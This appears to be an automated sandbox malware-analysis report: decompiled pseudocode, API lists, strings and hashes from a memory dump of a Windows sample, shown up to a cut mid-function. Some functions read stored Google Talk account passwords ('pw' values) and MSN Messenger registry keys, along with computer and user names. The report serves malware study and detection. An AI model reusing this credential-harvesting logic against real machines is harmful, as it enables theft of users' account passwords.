                                                                        			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                                        0x0040754d
                                                                        0x00407558
                                                                        0x00407562
                                                                        0x00407576
                                                                        0x0040757b
                                                                        0x00407580
                                                                        0x00407593
                                                                        0x00407597
                                                                        0x0040759b
                                                                        0x004075a0
                                                                        0x004075ad
                                                                        0x00407642
                                                                        0x00407642
                                                                        0x00407647
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004075cb
                                                                        0x004075d0
                                                                        0x004075d5
                                                                        0x004075e5
                                                                        0x004075ec
                                                                        0x0040760a
                                                                        0x0040760f
                                                                        0x00407621
                                                                        0x0040762a
                                                                        0x0040762a
                                                                        0x0040762c
                                                                        0x0040763d
                                                                        0x0040763d
                                                                        0x00407651
                                                                        0x00407651
                                                                        0x00407658

                                                                        APIs
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                          • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                                          • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                          • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                          • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                          • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                          • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                          • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 0040759B
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • memset.MSVCRT ref: 004075EC
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                        Strings
                                                                        • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                        • API String ID: 2959138223-1079885057
                                                                        • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                        • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                        • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                        • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}











                                                                        0x0040a5af
                                                                        0x0040a5b1
                                                                        0x0040a5b9
                                                                        0x0040a5be
                                                                        0x0040a5c0
                                                                        0x0040a5c2
                                                                        0x0040a5c7
                                                                        0x0040a5c8
                                                                        0x0040a5cd
                                                                        0x0040a5d6
                                                                        0x0040a5de
                                                                        0x0040a5e6
                                                                        0x0040a5e8
                                                                        0x0040a5eb
                                                                        0x0040a5f1
                                                                        0x0040a5f8
                                                                        0x0040a5f3
                                                                        0x0040a5f3
                                                                        0x0040a5f5
                                                                        0x0040a5f5
                                                                        0x0040a5f9
                                                                        0x0040a5fa
                                                                        0x0040a5fa
                                                                        0x0040a5ff
                                                                        0x0040a605
                                                                        0x0040a606
                                                                        0x0040a5c0
                                                                        0x0040a60b
                                                                        0x0040a616
                                                                        0x0040a621
                                                                        0x0040a637
                                                                        0x0040a63f
                                                                        0x0040a645
                                                                        0x0040a64d
                                                                        0x0040a652
                                                                        0x0040a652
                                                                        0x0040a668
                                                                        0x0040a676
                                                                        0x0040a67b
                                                                        0x0040a68d

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Cursor_mbsicmpqsort
                                                                        • String ID: /nosort$/sort
                                                                        • API String ID: 882979914-1578091866
                                                                        • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                        • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                        • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                        • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 25%
                                                                        			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                                        0x0040ee59
                                                                        0x0040ee59
                                                                        0x0040ee63
                                                                        0x0040ee70
                                                                        0x0040eea8
                                                                        0x0040eeae
                                                                        0x0040eeb9
                                                                        0x0040eec8
                                                                        0x0040eec9
                                                                        0x0040eece
                                                                        0x0040eed5
                                                                        0x0040eed8
                                                                        0x0040eed9
                                                                        0x0040eede
                                                                        0x0040eede
                                                                        0x0040eeed
                                                                        0x0040eef4
                                                                        0x0040ef0c
                                                                        0x0040ef17
                                                                        0x0040ef17
                                                                        0x0040ef25
                                                                        0x00000000
                                                                        0x0040ee8c
                                                                        0x0040ee90
                                                                        0x00000000
                                                                        0x0040ee90

                                                                        APIs
                                                                          • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                          • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                        • memset.MSVCRT ref: 0040EEAE
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                        • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                          • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 181880968-2036018995
                                                                        • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                        • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                        • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                        • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}


















                                                                        0x0040396c
                                                                        0x00403982
                                                                        0x0040398d
                                                                        0x00403998
                                                                        0x0040399a
                                                                        0x0040399e
                                                                        0x004039a5
                                                                        0x004039ae
                                                                        0x004039b2
                                                                        0x004039df
                                                                        0x004039e4
                                                                        0x00403a07
                                                                        0x004039e6
                                                                        0x004039f7
                                                                        0x004039f9
                                                                        0x004039fb
                                                                        0x00000000
                                                                        0x004039fd
                                                                        0x004039fd
                                                                        0x00000000
                                                                        0x004039fd
                                                                        0x004039fb
                                                                        0x004039b4
                                                                        0x004039c5
                                                                        0x004039c9
                                                                        0x004039db
                                                                        0x004039db
                                                                        0x004039cb
                                                                        0x004039cb
                                                                        0x004039cf
                                                                        0x004039d4
                                                                        0x004039d4
                                                                        0x004039c9
                                                                        0x00403a0c
                                                                        0x00403a10
                                                                        0x00403a1a
                                                                        0x00403a1a
                                                                        0x00403a1f
                                                                        0x00403a23
                                                                        0x00403a3c

                                                                        APIs
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                          • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                          • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                          • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                          • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                        Strings
                                                                        • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                        • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                        • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                        • API String ID: 1910562259-1741179510
                                                                        • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                        • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                        • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                        • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                                        0x0040ed18
                                                                        0x0040ed1e
                                                                        0x0040ed22
                                                                        0x0040ed2f
                                                                        0x0040ed33
                                                                        0x0040ed39
                                                                        0x0040ed41
                                                                        0x0040ed44
                                                                        0x0040ed4c
                                                                        0x0040ed50
                                                                        0x0040ed53
                                                                        0x0040ed56
                                                                        0x0040ed58
                                                                        0x0040ed58
                                                                        0x0040ed5c
                                                                        0x0040ed5f
                                                                        0x0040ed6f
                                                                        0x0040ed71
                                                                        0x0040ed75
                                                                        0x0040ed75
                                                                        0x0040ed79
                                                                        0x0040ed83
                                                                        0x0040ed83
                                                                        0x0040ed4c
                                                                        0x0040ed41
                                                                        0x0040ed88
                                                                        0x0040ed8e

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                        • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                        • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                        • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                        • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040EA72, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
				void _v8199;
				char _v8200;
				void* __ebx;
				int _t23;
				CHAR* _t31;

				E004118A0(0x2004, __ecx);
				_v8200 = 0;
				if(_a4 == 0) {
					memset( &_v8199, 0, 0x2000);
					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
					_t23 = E004067DC( &_v8200, __edi, _a16);
				} else {
					memset( &_v8199, 0, 0x2000);
					_t31 =  &_v8200;
					E00406763(_t31, _a16,  *__edi);
					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
				}
				return _t23;
			}








                                                                        0x0040ea7a
                                                                        0x0040ea85
                                                                        0x0040ea8b
                                                                        0x0040ead5
                                                                        0x0040eaf3
                                                                        0x0040eb03
                                                                        0x0040ea8d
                                                                        0x0040ea9a
                                                                        0x0040eaa1
                                                                        0x0040eaaa
                                                                        0x0040eabe
                                                                        0x0040eabe
                                                                        0x0040eb0d

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040EA9A
                                                                          • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                          • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                        • memset.MSVCRT ref: 0040EAD5
                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                        • String ID:
                                                                        • API String ID: 3143880245-0
                                                                        • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                        • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                        • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                        • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B785, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				struct HICON__* _t19;
				intOrPtr* _t23;
				void* _t25;

				_t23 = __ebx;
				_t14 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41356c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L004115D0();
				if(__eax == 0) {
					_t14 = 0;
					__eflags = 0;
				} else {
					 *0x417114 = __eax;
				}
				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
				L004115D0(); // executed
				_t32 = _t14;
				_t25 = 0xf38;
				if(_t14 == 0) {
					_t15 = 0;
					__eflags = 0;
				} else {
					_t15 = E00404016(_t14, _t32);
				}
				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
				 *((intOrPtr*)(_t23 + 0x378)) = 0;
				 *((intOrPtr*)(_t23 + 0x260)) = 0;
				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
				 *((intOrPtr*)(_t23 + 0x154)) = 0;
				_t16 =  *(_t23 + 0x258);
				if(_t16 != 0) {
					DeleteObject(_t16);
					 *(_t23 + 0x258) = 0;
				}
				_t17 = E00406252(); // executed
				 *(_t23 + 0x258) = _t17;
				E00401000(_t25, _t23 + 0x158, 0x413480);
				_t19 = LoadIconA( *0x416b94, 0x65); // executed
				E004017A4(_t23, _t19);
				return _t23;
			}












                                                                        0x0040b785
                                                                        0x0040b785
                                                                        0x0040b789
                                                                        0x0040b78f
                                                                        0x0040b795
                                                                        0x0040b79b
                                                                        0x0040b79d
                                                                        0x0040b7a3
                                                                        0x0040b7ab
                                                                        0x0040b7b4
                                                                        0x0040b7b4
                                                                        0x0040b7ad
                                                                        0x0040b7ad
                                                                        0x0040b7ad
                                                                        0x0040b7bb
                                                                        0x0040b7c1
                                                                        0x0040b7c6
                                                                        0x0040b7c8
                                                                        0x0040b7c9
                                                                        0x0040b7d4
                                                                        0x0040b7d4
                                                                        0x0040b7cb
                                                                        0x0040b7cd
                                                                        0x0040b7cd
                                                                        0x0040b7d6
                                                                        0x0040b7dc
                                                                        0x0040b7e2
                                                                        0x0040b7e8
                                                                        0x0040b7ee
                                                                        0x0040b7f4
                                                                        0x0040b7fc
                                                                        0x0040b7ff
                                                                        0x0040b805
                                                                        0x0040b805
                                                                        0x0040b80b
                                                                        0x0040b81b
                                                                        0x0040b821
                                                                        0x0040b82e
                                                                        0x0040b837
                                                                        0x0040b840

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$DeleteIconLoadObject
                                                                        • String ID:
                                                                        • API String ID: 1986663749-0
                                                                        • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                        • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                        • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                        • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00411932, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E00411932() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x417528;
				if(_t1 != 0) {
					_push(_t1);
					L004115D6();
				}
				_t2 =  *0x417530;
				if(_t2 != 0) {
					_push(_t2); // executed
					L004115D6(); // executed
				}
				_t3 =  *0x41752c;
				if(_t3 != 0) {
					_push(_t3);
					L004115D6();
				}
				_t4 =  *0x417534;
				if(_t4 != 0) {
					_push(_t4); // executed
					L004115D6(); // executed
					return _t4;
				}
				return _t4;
			}







                                                                        0x00411932
                                                                        0x00411939
                                                                        0x0041193b
                                                                        0x0041193c
                                                                        0x00411941
                                                                        0x00411942
                                                                        0x00411949
                                                                        0x0041194b
                                                                        0x0041194c
                                                                        0x00411951
                                                                        0x00411952
                                                                        0x00411959
                                                                        0x0041195b
                                                                        0x0041195c
                                                                        0x00411961
                                                                        0x00411962
                                                                        0x00411969
                                                                        0x0041196b
                                                                        0x0041196c
                                                                        0x00000000
                                                                        0x00411971
                                                                        0x00411972

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                        • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                        • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                        • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E0040787D() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x417540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x417540 = 0x8000;
					 *0x417544 = 0x100;
					 *0x417548 = 0x1000; // executed
					L004115D0(); // executed
					 *0x417528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x417544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L004115D0();
					 *0x417530 = _t16;
					_t29 = 4;
					_t18 =  *0x417544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L004115D0();
					_push( *0x417548);
					 *0x417534 = _t18; // executed
					L004115D0(); // executed
					 *0x41752c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                                        0x0040787d
                                                                        0x00407884
                                                                        0x0040788b
                                                                        0x0040788c
                                                                        0x00407891
                                                                        0x0040789b
                                                                        0x004078a5
